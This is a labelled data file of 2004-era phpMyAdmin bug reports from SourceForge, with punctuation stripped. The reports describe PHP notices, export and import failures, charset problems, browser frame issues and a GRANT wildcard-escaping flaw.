Also, the missing records were not the last 21 in the import file.
Obviously there was another problem somewhere.
Possibly, there were duplicate keys, I don t really know.
My point is that there seems to be no feature in phpMyAdmin for reporting Import errors.
It just seems to dump records and doesn t tell me about it.
That is VERY BAD.
Am I missing something here?
Do you know of an import error report feature available with phpMyAdmin?
And, if you do would you please tell me how to use it?
If not, please fix this inadequacy with phpMyAdmin.
Thanks, Paul Original URL https sourceforge.net p phpmyadmin bugs 1271 https sourceforge.net p phpmyadmin bugs 1271 Original author anonymous","bug"
"24444","7640","Server processlist.php sometimes shows Array.
About 50 of the time when I look at the processlist via phpmyadmin we get Array instead of the query.
For example, this is what it looks like Kill 713 phpmyadmin2 parking slavei.xyxyxyxy.com 45695 mysql Query 0 Array When it should really show SHOW PROCESSLIST instead of Array.
I changed the line 81, in the server processlist.php so that we can always see the real results.
lt;td bgcolor= lt;?php echo useBgcolorOne ?
cfg [ BgcolorOne ] cfg[ BgcolorTwo ]; ?
gt; gt; amp;nbsp; lt;?php echo empty value[ Info ]) ?
PMA SQP formatHtml PMA SQP parse value [ Info ]))); ?
gt; amp;nbsp; lt;?
echo value[ Info ] ?
gt; lt; td gt; So it seems that the PMA SQP formatHtml can t parse things all of the time.
Nothing major, just an annoyance.
Donny Original URL https sourceforge.net p phpmyadmin bugs 1273 https sourceforge.net p phpmyadmin bugs 1273 Original author anonymous","bug"
"24444","7641","themesCount.
Hi, I just got the latest MyAdmin version via CVS and now get the error Notice Undefined variable themesCount in C \Webs\phpMyAdmin\libraries\select theme.lib.php on line 66 I see themesCount is only used in select theme.lib.php on line 66 Best, Bernhard Original URL https sourceforge.net p phpmyadmin bugs 1274 https sourceforge.net p phpmyadmin bugs 1274 Original author bardware","bug"
"24444","7642","Undefined HTTP HOST.
Notice Undefined index HTTP HOST in var www html phpMyAdmin header.inc.php on line 44 This error appears in the latest CVS 2004 06 15) Vytautas Original URL https sourceforge.net p phpmyadmin bugs 1275 https sourceforge.net p phpmyadmin bugs 1275 Original author vytautas Found in version Latest Git","bug"
"24444","7643","Cannot handle importing exporting large amounts of records.
I have one table with over 50,000 records and a few other tables with over 2,000 records.
When I try to export the data from all tables to a file, it chokes.
I found that I had to export individual tables to do it.
I think that phpMyAdmin is great but it needs to be tested particularly with large data sets to improve its efficiency as a data admin tool for larger data stores.
Original URL https sourceforge.net p phpmyadmin bugs 1276 https sourceforge.net p phpmyadmin bugs 1276 Original author anonymous","bug"
"24444","7644","Cant target main frame from Firefox 0.9.
I just upgraded from Firefox 0.8 to 0.9 on Mac OS X) and now when I click on a table name in the left frame, it does not load anything in the main frame.
If I right click on the link and open it in a new window or new tab, it loads correctly, so it must not be targeting the main frame correctly.
The main frame can correctly target itself by click on the Privileges link for example), and the left frame can correctly target itself by selecting a database from the drop down for example).
I did a little investigation and noticed that the links in the left frame are targeting the frame named phpmain .
But the main frame actually has the name of phpmain89cfbe7a7f3a35e61fc956d473cbb36d so it cant target it.
Clearly you are passing some information around, so it must not the latest version of Firefox for the mac must be blocking it somehow.
I have it set to accept all cookies, so it dont think I am being stupid.
I am running the latest version 2.5.7 with MySQL 3.23.58 and PHP Version 4.3.2 on Apache 2.0 under redhat Original URL https sourceforge.net p phpmyadmin bugs 1277 https sourceforge.net p phpmyadmin bugs 1277 Original author anonymous","bug"
"24444","7645","Error displaying results on some strange tables.
I have a tbale with the next fields login, pass, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 but when I see the database with phpMyAdmin, I can t see the pass field.
all the values from 1 to 11 are rolled one place to the left.
the attachment is a zip file with the error corrected.
see files.txt for details Original URL https sourceforge.net p phpmyadmin bugs 1278 https sourceforge.net p phpmyadmin bugs 1278 Original author anonymous Found in version 2.5.6","bug"
"24444","7646","Missing index [DisplayServersList] in config.inc.php.
config.inc.php Id config.inc.php,v 2.28 2004 06 15 13 05 01 nijel Exp Line 204 should be cfg[ DisplayServersList ] ... and not cfg[ LeftDisplayServersList ] ... Greetings Peter Original URL https sourceforge.net p phpmyadmin bugs 1279 https sourceforge.net p phpmyadmin bugs 1279 Original author mandabaer","bug"
"24444","7647","export back button of the browser displays compressed file.
Hi All, the following code mostly from phpmyadmin source) successfully downloads and unzips to the ms excel csv file but when i use the back button of the browser after the download)the compressed zipped code is displayed in the browser IE) window.
[BTW the back button is fine on wampp2 arch.
using IE] i m using LAM ySQL]p\{HP] arch.
on Compaq Tru64 UNIX V5.1A Rev.
1885) IE Bug Note while on a different note exporting a zip csv excel file with Netscape windows) from phpmyadmin on LAMP above) architecture gives inavalid zip archive error .
thanks for your help.
lkj php what = excel ; ext; if what == csv || what == excel ) \{ ext = csv ; mime type = text x csv ; \} ext .= .zip ; mime type = application x zip ; extbis = .csv ; if isset compression) compression == zip ) \{ if PMA PHP INT VERSION gt;= 40000 function exists gzcompress )) \{ filename = reportName.
POST [ datasetName ] .
.
startYear .
.
finishYear; zipfile = new zipfile ); zipfile gt; addFile dump buffer, filename .
extbis); dump buffer = zipfile gt; file ); header Content Type .
mime type); header Expires .
now); IE need specific headers if strstr SERVER[ HTTP USER AGENT ], compatible; MSIE ) !== false ) \{ header Content Disposition inline; filename= .
filename .
.
.
ext .
); header Cache Control must revalidate, post check=0, pre check=0 ); header Pragma public ); \} else \{ header Content Disposition attachment; filename= .
filename .
.
.
ext .
); header Pragma no cache ); \} echo dump buffer; ?
gt; Original URL https sourceforge.net p phpmyadmin bugs 1280 https sourceforge.net p phpmyadmin bugs 1280 Original author anonymous","bug"
"24444","7648","iso 8859 8 i unknown to mb internal encoding.
Error is in recent versions of phpMyAdmin including latest alpha), when switching language to hebrew, PHP displays error Warning mb internal encoding ) [function.mb internal encoding] Unknown encoding iso 8859 8 i in c \webserver\Apache\htdocs\phpmyadmin\libraries\string.lib.php on line 23 The solution is to add specific check for this charset line 19, string.lib.php) Replace mb internal encoding GLOBALS[ charset ]); With if GLOBALS[ charset ] == iso 8859 8 i ) mb internal encoding iso 8859 8 ); else mb internal encoding GLOBALS[ charset ]); P.S.
My first bug report.
Original URL https sourceforge.net p phpmyadmin bugs 1281 https sourceforge.net p phpmyadmin bugs 1281 Original author moshe be","bug"
"24444","7649","SQL window field list of a non existing table.
I created a new table via Create new table on database XXX ) while having the SQL windows open.
The window, however, tries to read the field list from the table which is of course not yet existing.
Original URL https sourceforge.net p phpmyadmin bugs 1282 https sourceforge.net p phpmyadmin bugs 1282 Original author marcwpt Found in version 2.6.0 beta1","bug"
"24444","7650","No edit window when long text and no prim key.
Wenn i insert following string into a field, PhpMyadmin don t show the edit window.
Insert following example into a string [longtext] field....
THIS IS ONLY AN EXAMPLE!
You can disable a server config entry by setting host to .
i ; cfg[ Servers ][ i][ host ] = localhost ; MySQL hostname or IP address cfg[ Servers ][ i][ port ] = ; MySQL port leave blank for default port cfg[ Servers ][ i][ socket ] = ; Path to the socket leave blank for default socket cfg[ Servers ][ i][ connect type ] = tcp ; How to connect to MySQL server tcp or socket ) cfg[ Servers ][ i][ compress ] = FALSE; Use compressed protocol for the MySQL connection requires PHP gt;= 4.3.0) cfg[ Servers ][ i][ controluser ] = root ; MySQL control user settings this user must have read only cfg[ Servers ][ i][ controlpass ] = ; access to the mysql user and mysql db tables).
The controluser is also used for all relational features pmadb) cfg[ Servers ][ i][ auth type ] = cookie ; Authentication method config, http or cookie based)?
cfg[ Servers ][ i][ user ] = root ; MySQL user cfg[ Servers ][ i][ password ] = ; MySQL password only needed with config auth type) cfg[ Servers ][ i][ only db ] = ; If set to a db name, only this db is displayed in left frame It may also be an array of db names, where sorting order is relevant.
cfg[ Servers ][ i][ verbose ] = ; Verbose name for this host leave blank to show the hostname cfg[ Servers ][ i][ pmadb ] = ; Database used for Relation, Bookmark and PDF Features see scripts create tables.sql) leave blank for no support DEFAULT phpmyadmin cfg[ Servers ][ i][ bookmarktable ] = ; Bookmark table leave blank for no bookmark support DEFAULT pma bookmark cfg[ Servers ][ i][ relation ] = ; table to describe the relation between links see doc) leave blank for no relation links support DEFAULT pma relation cfg[ Servers ][ i][ table info ] = ; table to describe the display fields leave blank for no display fields support DEFAULT pma table info cfg[ Servers ][ i][ table coords ] = ; table to describe the tables position for the PDF schema leave blank for no PDF schema support DEFAULT pma table coords cfg[ Servers ][ i][ pdf pages ] = ; table to describe pages of relatio lt;a href= onClick= this.style.behavior= url default homepage) ; this.setHomePage http kdob2.wob.vw.vwg rb ); gt;Klick, um Seite als Startseite festzulegen.
lt; a gt; Original URL https sourceforge.net p phpmyadmin bugs 1283 https sourceforge.net p phpmyadmin bugs 1283 Original author anonymous Found in version 2.5.7","bug"
"24444","7651","Error when editing record with relation set.
Error when editing record with relation set When i try edit some record, where some fields are connected to another table by relation, i get SQL error from query like this SELECT display field FROM WHERE db name = espe AND table name = db users ...weird type of select....
Original URL https sourceforge.net p phpmyadmin bugs 1284 https sourceforge.net p phpmyadmin bugs 1284 Original author fredyc Found in version 2.5.7","bug"
"24444","7652","Export not working with E STRICT.
Trying to export data to a file does not work with the error notification E STRICT on, due to usage of var statement.
Original URL https sourceforge.net p phpmyadmin bugs 1285 https sourceforge.net p phpmyadmin bugs 1285 Original author anonymous","bug"
"24444","7653","Fatal error in queryframe.php.
When I select a table from the dropdown list in the upper left frame, the rest of the page loads but the frame stops with this Fatal error Call to undefined function PMA queryBookmarks ) in phpMyAdmin queryframe.php on line 301 I did a bit of searching, and adding a line require once .
libraries bookmark.lib.php ); in the queryframe.php file seems to fix the error for me.
Commenting out line 301 also worked.
[anthony.parsons manx.net] Original URL https sourceforge.net p phpmyadmin bugs 1286 https sourceforge.net p phpmyadmin bugs 1286 Original author anonymous Found in version Latest Git","bug"
"24444","7654","edit window fails to open.
One of my users pointed out that one of our tables has become uneditable since we upgraded to 2.5.7.
We can to edit this table with 2.5.3 but not 2.5.6 or 2.5.7, therefore I suggest that a bug has crept in since 2.5.3.
Perhaps this is the same problem described in 976720.)
Browsing the table displays the records, but if you click on a record s Edit icon, the window displays the expected headline e.g., Database test Table reportgen running on localhost ) but nothing else.
The following table structure and data are sufficient on our servers, at least) to demonstrate the problem.
We are running MySQL 3.23.58 and PHP 4.1.2 on an up to date Red Hat Legacy 7.3 server.
CREATE TABLE `reportgen` `code` varchar 20) NOT NULL default , `topic` text, `topicorder` tinyint 2) NOT NULL default 0 , `variablename` varchar 20) NOT NULL default , `inputtag` text NOT NULL, KEY `code` `code`,`topicorder`) ) TYPE=MyISAM; INSERT INTO `reportgen` VALUES mcrquarterreport , Institution , 1, InstName , lt;select NAME= InstName gt;\r\n lt;option value= Central Public Library lt;BR gt;10 W. 14th Avenue lt;BR gt;Danvers, CT gt;Central Public Library\r\n lt;option value= Memorial Library lt;br gt;4200 E. 9th Ave lt;br gt;BOX A003 lt;br gt;Danvers, CT gt;Memorial Library\r\n lt;option value= Medical Library lt;br gt;2010 North Kansas lt;br gt;Wichita KS gt;Medical Library\r\n lt;option value= Public Library lt;br gt;1000 Canyon Blvd.
lt;br gt;Wichita KS gt;Health Information Center\r\n lt;option value= Eccles Library lt;BR gt;4037 University lt;BR gt;Salt Lake City UT gt;Eccles Library\r\n lt;option value= Otto Library lt;BR gt;University of Columbia lt;BR gt;329 Main lt;BR gt;Columbia, MO gt;Otto Library\r\n lt;option value= Area Health Center lt;br gt;1000 W 10th Street lt;br gt;Memphis, MO gt;Area Health Center\r\n lt;option value= Medical Library lt;br gt;St. John\ s Health System lt;br gt;1235 East Main St. lt;br gt;Springfield, IL gt;Medical Library, St. John\ s Health System\r\n lt;option value= Medical Library lt;br gt;Medical Center lt;br gt;375 East Park Avenue lt;br gt;Durango, OR gt;Mercy Medical Center\r\n lt;option value= City Library lt;br gt;P.O.
Box 668 lt;br gt;Portland, ME gt;City Library\r\n lt;option value= Valley Health System lt;BR gt;1024 South Egan Avenue lt;BR gt;Fort Bunt, NM gt;Valley Health System\r\n lt;option value= Veterinary Library lt;br gt;Ohio State University lt;br gt;408 Mott Hall lt;br gt;Manhattan, OH gt;Veterinary Library\r\n lt; SELECT gt;\r\n ); Original URL https sourceforge.net p phpmyadmin bugs 1287 https sourceforge.net p phpmyadmin bugs 1287 Original author boerm","bug"
"24444","7655","relation view and MySQLi MySQL out of sync).
When calling the realtion view from tbl properties structure, MySQL returns an error MySQL out of sync) on the SHOW KEYS query.
Original URL https sourceforge.net p phpmyadmin bugs 1288 https sourceforge.net p phpmyadmin bugs 1288 Original author rabus Found in version Latest Git","bug"
"24444","7656","Wrong splitting when unpaired quotes in comments.
If an SQL dump file contains a USE command like our create tables.sql the query is not splitted correctly.
Original URL https sourceforge.net p phpmyadmin bugs 1289 https sourceforge.net p phpmyadmin bugs 1289 Original author rabus Found in version Latest Git","bug"
"24444","7657","Left frame does not reload on CREATE TABLE.
If a dump contains CREATE TABLE statements and most dumps do o) ), the left frame is not reloaded anymore.
Original URL https sourceforge.net p phpmyadmin bugs 1290 https sourceforge.net p phpmyadmin bugs 1290 Original author rabus Found in version Latest Git","bug"
"24444","7658","Missing go button in query window file import).
In file import part of query window, there is missing go button.
Original URL https sourceforge.net p phpmyadmin bugs 1291 https sourceforge.net p phpmyadmin bugs 1291 Original author nijel Found in version Latest Git","bug"
"24444","7659","Not possible to select part of export using mouse.
Since export is displayed in textarea, it is not possible to select part of it using mouse, allways whole textarea is selected.
Original URL https sourceforge.net p phpmyadmin bugs 1292 https sourceforge.net p phpmyadmin bugs 1292 Original author nijel Found in version Latest Git","bug"
"24444","7660","LIMIT appending broken for multiple queries.
When you execute more queries and last one is SELECT, it goes to browse mode, but the query is displayed wrongly but executed correctly).
Shown query SELECT FROM `hokus` WHERE 1 ; SELECT FROM `hokus` WHERE 1 ; LIMIT 0 , 30 Original URL https sourceforge.net p phpmyadmin bugs 1293 https sourceforge.net p phpmyadmin bugs 1293 Original author anonymous Found in version Latest Git","bug"
"24444","7661","queryframe.php throwing notices.
The following notices make me have to highlight to scroll down in queryframe.php to get to the dropdown menu that lets me select a db.
It s happening in the 2.6.0 beta1 release and the 2.6.0 beta2 snapshot I just downloaded.
Notice Undefined index cfg in home deekayen public html aai public html phpmyadmin libraries bookmark.lib.php on line 30 Notice Undefined index cfg in home deekayen public html aai public html phpmyadmin libraries bookmark.lib.php on line 31 Notice Undefined index cfg in home deekayen public html aai public html phpmyadmin libraries bookmark.lib.php on line 32 Original URL https sourceforge.net p phpmyadmin bugs 1294 https sourceforge.net p phpmyadmin bugs 1294 Original author deekayen Found in version 2.6.0 beta1","bug"
"24444","7662","granting db privileges doesn t use wildcards.
When granting privileges for a database with an underscore in the database name, this underscore is not being escaped in the query.
Thus giving the user the right to create another database with the underscore in the name replaced with another character.
Example Database www mydomain com Go to page server privileges.php and grant a user all privileges on that database.
The query executed will be something like GRANT SELECT , INSERT ON `www mydomain com` .
TO theuser localhost ; Instead of GRANT SELECT , INSERT, CREATE ON `www\ mydomain\ com` .
TO theuser localhost ; After this, this user is able to create another database, with name wwwXmydomainXcom or just another character) Geert van der Ploeg Original URL https sourceforge.net p phpmyadmin bugs 1295 https sourceforge.net p phpmyadmin bugs 1295 Original author geertp Found in version 2.6.0 beta1","bug"
"24444","7663","Undefined variable db.
After I log in cookie login mode), I get these errors in the source of the main page, right frame Undefined variable db in pma phpMyAdmin 2.6.0 beta1 footer.inc.php on line 24 Undefined variable db in pma phpMyAdmin 2.6.0 beta1 footer.inc.php on line 26 Undefined variable db in pma phpMyAdmin 2.6.0 beta1 footer.inc.php on line 41 etc.
Original URL https sourceforge.net p phpmyadmin bugs 1296 https sourceforge.net p phpmyadmin bugs 1296 Original author ryandesign Found in version 2.6.0 beta1","bug"
"24444","7664","Foreign keys not added consequently with innoDB.
When exporting tables of type engine=innoDB in phpMyAdmin 2.5.7, and there are two or more foreign keys in a table, only the first foreign key is added at the end of the dump script.
The other keys are in the CREATE TABLE line.
This will cause a syntax error when importing because of comma s).
Besides, the tables have to be created in the correct order.
In version 2.5.5 pl1, all foreign keys are addes at the end of the dump script, and it works perfectly.
Here is an example of a correct dump 2.5.5 pl1) phpMyAdmin SQL Dump version 2.5.5 pl1 Server version 4.0.12 PHP Version 4.3.4 CREATE TABLE `dep diag` `dep diag id` int 11) NOT NULL auto increment, `dep id` int 11) NOT NULL default 0 , `diag id` int 11) NOT NULL default 0 , `impact` char 3) NOT NULL default 0 , PRIMARY KEY `dep diag id`), KEY `dep id` `dep id`), KEY `diag id` `diag id`) ) TYPE=InnoDB AUTO INCREMENT=1895 ; Constraints for table `dep diag` ALTER TABLE `dep diag` ADD FOREIGN KEY `diag id`) REFERENCES `diag` `diag id`) ON DELETE CASCADE ON UPDATE CASCADE, ADD FOREIGN KEY `dep id`) REFERENCES `dep` `dep id`) ON DELETE CASCADE ON UPDATE CASCADE; and here of a dump with syntax error 2.5.7) phpMyAdmin SQL Dump version 2.5.7 Server version 4.0.12 PHP Version 4.3.4 CREATE TABLE `dep diag` `dep diag id` int 11) NOT NULL auto increment, `dep id` int 11) NOT NULL default 0 , `diag id` int 11) NOT NULL default 0 , `impact` char 3) NOT NULL default 0 , PRIMARY KEY `dep diag id`), KEY `dep id` `dep id`), KEY `diag id` `diag id`) FOREIGN KEY `dep id`) REFERENCES `dep` `dep id`) ON DELETE CASCADE ON UPDATE CASCADE ) TYPE=InnoDB AUTO INCREMENT=1895 ; Constraints for table `dep diag` ALTER TABLE `dep diag` ADD FOREIGN KEY `diag id`) REFERENCES `diag` `diag id`) ON DELETE CASCADE ON UPDATE CASCADE,; Original URL https sourceforge.net p phpmyadmin bugs 1297 https sourceforge.net p phpmyadmin bugs 1297 Original author jbeex Found in version Latest Git","bug"
"24444","7665","MySQL 4.0.20d for windows shows as 4.0.20a in phpmyadmin.
MySQL 4.0.20d for windows shows as 4.0.20a in phpmyadmin Original URL https sourceforge.net p phpmyadmin bugs 1299 https sourceforge.net p phpmyadmin bugs 1299 Original author anonymous Found in version 2.5.7","bug"
"24444","7666","http bugs.php.net bug.php?id=28933.
problem with mysqli fetch array on dual opteron mysql 5 cvs apache cvs.
mysqli.dbi.lib.phpbug 2004 06 26 13 27 47.907086280 0200 mysqli.dbi.lib.php 2004 06 26 13 24 43.386137728 0200 122,8 122,18 function PMA mysqli fetch array result, type = FALSE) \{ global cfg, allow recoding, charset, convcharset; \ temporary workaround see http bugs.php.net bug.php?id=28933 if type != FALSE) \{ data = mysqli fetch array result, type); \ switch type) \{ \ case MYSQLI NUM \ data = mysqli fetch row result); \ break; \ case MYSQLI ASSOC \ data = mysqli fetch assoc result); \ break; \ default \ data = mysqli fetch array result); \ \} \} else \{ data = mysqli fetch array result); \} Original URL https sourceforge.net p phpmyadmin bugs 1300 https sourceforge.net p phpmyadmin bugs 1300 Original author anonymous Found in version Latest Git","bug"
"24444","7667","Javascript error on index page.
Upgraded as normal to PMA 2.6.0b1.
A Javascript error has appeared on loading the index page as follows Line 317 Char 1 Error Syntax error Code 0 URL http localhost phpmyadmin main.php?lang=en iso8859 1 server=1 Using PMA 2.6.0b1, Windows XP, PHP 4.3.7, mySQL 4.0.18.
Error also in CVS.
Original URL https sourceforge.net p phpmyadmin bugs 1298 https sourceforge.net p phpmyadmin bugs 1298 Original author anonymous Found in version 2.6.0 beta1","bug"
"24444","7668","E WARNING produced by mysql.dbi.lib.php.
When using 2.6.0 beta1 I get the following error Warning mysql query ) Unable to save result set in path to libraries dbi mysql.dbi.lib.php on line 122 Please select a database Which is this code if options == options | PMA DBI QUERY STORE)) \{ return mysql query query, link); And mysql error ) here reports the following error Can t read dir of .
logs Errcode 13) And mysql errno ) provides 12 Aside from this error everything appears to work fine so I just prepended a although this of course isn t a final solution, or maybe it is! )
MySQL 3.23.57 log PHP 4.3.2 Sorry I am not familiar with log versions of MySQL but this is the version of MySQL this web host uses.
I ve never seen the error before but am unsure how to test for it ) Original URL https sourceforge.net p phpmyadmin bugs 1301 https sourceforge.net p phpmyadmin bugs 1301 Original author anonymous Found in version 2.6.0 beta1","bug"
"24444","7669","Copy table with timestamp fails MySQL 4.1.2).
If you have a table with a timestamp in it, and you use the Copy table to option it will fail.
Below is an example of how it fails CREATE TABLE `test`.`test3` `row1` int 10 ) unsigned NOT NULL default 0 , `row2` int 10 ) unsigned NOT NULL default 0 , `datestamp` timestamp NOT NULL defaultCURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP, PRIMARY KEY `row1` , `row2` ) ) ENGINE = MYISAM DEFAULT CHARSET = latin1 And the error message is 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near defaultCURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP, PRIMARY KEY `row1` , at line 3 The problem is that you need an extra space after `datestamp` timestamp NOT NULL default And before CURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP, Hope this helps.
Donny Original URL https sourceforge.net p phpmyadmin bugs 1302 https sourceforge.net p phpmyadmin bugs 1302 Original author donsimon Found in version 2.6.0 beta1","bug"
"24444","7670","Exporting mysql.user table.
In the past, when you exported the mysql.user table you would see all of the information that you were exporting.
Now I see it s in new format that doesn t allow you to read it and determine which ones that you want to copy.
I assume this was added to High ASCII character sets, but is there any way of adding a flag that allows us to see the old version?
Most people take their permissions from one server, but go through the list and determine which ones need to actually be on a new server.
We do this everytime we copy the user data from one server to another.
The current system just doesn t make sense, since MySQL itself doesn t even return the data in that format.
Donny Original URL https sourceforge.net p phpmyadmin bugs 1303 https sourceforge.net p phpmyadmin bugs 1303 Original author donsimon Found in version 2.6.0 beta1","bug"
"24444","7671","cross window updates.
i m using OS winxp home Browser Mozilla 1.5 MySQL MySQL 5.0.0. alpha PHP php 4.3.7 Webserver Apache 2.0.49 problem Relation view `The targetr browser windows could not be updated.
Maybe you have closed the parent window or your browser is blocking cross window updates of your security settings` how could i solve this no priority problems?
and how i can fix up the relation view description in pop up windows... please apologize me for my ignorance thanks in advance Original URL https sourceforge.net p phpmyadmin bugs 1304 https sourceforge.net p phpmyadmin bugs 1304 Original author anonymous","bug"
"24444","7672","Bug php code injection.
Hi, i found an an article mentioned at http securityfocus.com archive 1 367486 2004 06 26 2004 07 02 0 I haven t prooved it.
Original URL https sourceforge.net p phpmyadmin bugs 1307 https sourceforge.net p phpmyadmin bugs 1307 Original author evoluzzer Found in version 2.5.7","bug"
"24444","7673","Database view shows errors from bookmark.lib.php.
Notice Undefined index cfg in var www phpMyAdmin 2.
6.0 beta1 libraries bookmark.lib.php on line 30 Original URL https sourceforge.net p phpmyadmin bugs 1305 https sourceforge.net p phpmyadmin bugs 1305 Original author anonymous Found in version 2.6.0 beta1","bug"
"24444","7674","Undefined index LeftWidth in index.php on line 98.
This error appears when you first view phpmyadmin but seems to fix itself if you refresh the page then it doesn t appear anymore.
phpmyadmin 2.6.0 beta2 Original URL https sourceforge.net p phpmyadmin bugs 1308 https sourceforge.net p phpmyadmin bugs 1308 Original author anonymous Found in version Latest Git","bug"
"24444","7675","database selection in the left frame under opera.
it works mormally under ie but not under opera.
i have version 2.6.0 beta 2 previously i had 2.4 and it worked.
there are all the databases in the dropdown list in the left frame.
when i click a database it disappeares from the list.
Original URL https sourceforge.net p phpmyadmin bugs 1306 https sourceforge.net p phpmyadmin bugs 1306 Original author freeman3 Found in version Latest Git","bug"
"24444","7676","Default Operator LIKE ... .
Having the default search operator of char varchar being set to Like ... is not a very good idea.
Can we at least have the option in the config file to change it to just be LIKE or =.
Right now I have to go edit the tbl select.php script to change the defaults.
It would be much easier for the people who don t like to use the LIKE ... command, since it is so much slower.
Donny Original URL https sourceforge.net p phpmyadmin bugs 1309 https sourceforge.net p phpmyadmin bugs 1309 Original author donsimon Found in version 2.6.0 beta1","bug"
"24444","7677","error in search mode with foreign key.
phpMyAdmin 2.5.7 pl1 MySQL 4.0.20 log running on localhost I create to tables in two different databases test CREATE TABLE `test` `EMPLOYEE ID` int 11) NOT NULL default 0 , KEY `EMPLOYEE ID` `EMPLOYEE ID`) ) TYPE=InnoDB; human resources CREATE TABLE `employee` `EMPLOYEE ID` int 11) NOT NULL auto increment, PRIMARY KEY `EMPLOYEE ID`), ) TYPE=InnoDB; and create reference ALTER TABLE test.test ADD FOREIGN KEY EMPLOYEE ID) REFERENCES human resources.employee EMPLOYEE ID) in search mode on table test.test got error on field employee id print screen in attached file) SQL query SHOW TABLE STATUS FROM `test` LIKE employee MySQL said 1146 Table test.employee doesn t exist Original URL https sourceforge.net p phpmyadmin bugs 1310 https sourceforge.net p phpmyadmin bugs 1310 Original author aig Found in version 2.5.7","bug"
"24444","7678","cfg[ LeftWidth ] now theme specific??.
Ever since themes, it appears that cfg[ LeftWidth ] is specified in each theme s colors.inc.php.
The default theme specifies a width of 200px.
The dark blue orange theme makes it 180px.
I don t see why this setting should be theme specific; I set this option differently on each server on which I set up PMA.
On server A we have very long table names, so I need a large left width; on server B we only have two databases with short table names, so a shorter width is ok.
So, the simple request is get that out of the colors.inc.php and back into the config.inc.php You may also wish to consider is colors.inc.php the right name for the theme s configuration file?
Even overlooking the left width, it still specifies more than just colors the border width, for example).
Original URL https sourceforge.net p phpmyadmin bugs 1311 https sourceforge.net p phpmyadmin bugs 1311 Original author ryandesign Found in version Latest Git","bug"
"24444","7679","Page header alignment in RTL scripts.
I switched to Arabic just for fun, and I don t think the page header looks the way it s intended.
In English and other LTR scripts, the welcome text is on the far left, and the PMA logo is on the far right side of the page.
In Arabic and other RTL scripts, though, the PMA logo is right up next to the welcome message, and their strangely semi centered.
The welcome message isn t right aligned as it should be.
It looked correct in 2.5.7.
Easiest to explain by just looking at it.
See attached screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 1312 https sourceforge.net p phpmyadmin bugs 1312 Original author ryandesign Found in version Latest Git","bug"
"24444","7680","Arabic UTF 8 looks weird.
I was looking at some of the different languages available in PMA and noticed odd behavior when selecting the Arabic UTF 8 variant.
When compared with the win1256 charset version, several characters are obviously wrong.
Also, in the header, the win1256 version says phpMyAdmin 2.6.0 beta2 but the UTF 8 version says beta2phpMyAdmin 2.6.0 See attached screenshot.
I wanted to check if this problem already existed in 2.5.7 pl1, but there I don t even have the option to select the UTF 8 languages.
I looked through a couple other UTF 8 languages and didn t see weird chars there.
I only tested in the Mac OS X browsers Safari 1.2.2 and Firefox 0.9 Original URL https sourceforge.net p phpmyadmin bugs 1313 https sourceforge.net p phpmyadmin bugs 1313 Original author ryandesign Found in version Latest Git","bug"
"24444","7681","Save as file TABLE doesn t work.
Sorry if this is a dupe .. its a bugger searching for table , save as and template . )
Problem When exporting a table, checking the Save as file option, and using TABLE in the template name, the saved file is outputted as TABLE .
format) instead of table name).
format).
to Reproduce Choose a database, and click on Export tab.
Select any export format.
Choose a table, and check the Save as file box.
For File name template, enter TABLE and click Go Original URL https sourceforge.net p phpmyadmin bugs 1314 https sourceforge.net p phpmyadmin bugs 1314 Original author sdibb Found in version 2.6.0 beta1","bug"
"24444","7682","uft8 characters become corrupted on insert.
Hi.
I have mysql 4.1.2 alpha nt installed and use phpMyAdmin 2.6.0 beta2.
This option wasn t available for the group yet so I used 2.0.6 beta1 there).
The character set for the user interface is set to de utf 8.
When I try to insert greek uft 8 characters they are changed to ????
although the character set and the collation of the table are utf 8.
The db command that is shown by PMA still shows the correct characters but they are not inserted correctly.
I wonder wether this could be related to the fact that a lot of the mysql system variables still show latin1 as charset ========================================== Variable | Wert fxc3xbcr diese Sitzung | Globaler Wert character set client | utf8 | latin1 character set connection | latin1 | latin1 character set database | latin1 | latin1 character set results | utf8 | latin1 character set server | latin1 | latin1 character set system | utf8 | utf8 character sets dir | E \mysql\share\charsets | E \mysql\share\charsets collation connection | latin1 swedish ci | latin1 swedish ci collation database | latin1 swedish ci | latin1 swedish ci collation server | latin1 swedish ci | latin1 swedish ci ========================================== If I use php directly to enter the data and use set names utf8 the characters are inserted correctly.
The problem seems to be browser independent tested with Opera 7.51, Opera 6.05, IE6 and Netscape 7.1) Another interesting fact is that German characters such as xc3xa4 xc3xb6 xc3xbc are correctly inserted.
Best Regards, Christian Original URL https sourceforge.net p phpmyadmin bugs 1315 https sourceforge.net p phpmyadmin bugs 1315 Original author anonymous Found in version 2.6.0 beta2","bug"
"24444","7683","NS4, CSS, and Window Resizing.... Hey there, I ve just finished reading my book Son of Webpages That Suck by Vincent Flanders and they ve mentioned in there something about Netscape 4 and when you resize the window, all the CSS on the page will mess up.
They ve provided a link in the book to fix this.
http www.the cool place.co.uk javascript cutandpaste cutandpaste12.html Maybe you should put this in your source code in case if people who still use NS4 I don t know why they would be anyway) could avoid this bug by having it refresh the page when they resize the window.
Just a thing to think about.
Best of Luck, Mike S. Original URL https sourceforge.net p phpmyadmin bugs 1316 https sourceforge.net p phpmyadmin bugs 1316 Original author izcool Found in version Latest Git","bug"
"24444","7684","MIME based in print view need to select the pk.
There is a problem displaying PNG images BLOBs in print view mode.
Everthing works fine in the normal Browsing mode, but if I change to print view, the alt [BLOB XX.X KB] is shown instead of the picture itself.
My settings are as following MIME type image png Browser transformation image png inline A second thing is, that in normal browse mode images are only displayed correctly, if I also select the primary key id column.
If i dont show this, the displaying of images also fails and the alt [BLOB XX.X KB] appears.
phpmyadmin version is 2.5.7 pl1 debian testing package), but it was the same with the previous 2.5.6.
I tested it with Mozilla 1.6 , Mozilla Firefox 0.8 and Konqueror 3.2.2 running on a Debian Testing System Original URL https sourceforge.net p phpmyadmin bugs 1317 https sourceforge.net p phpmyadmin bugs 1317 Original author anonymous","bug"
"24444","7685","Bug mysql export function.
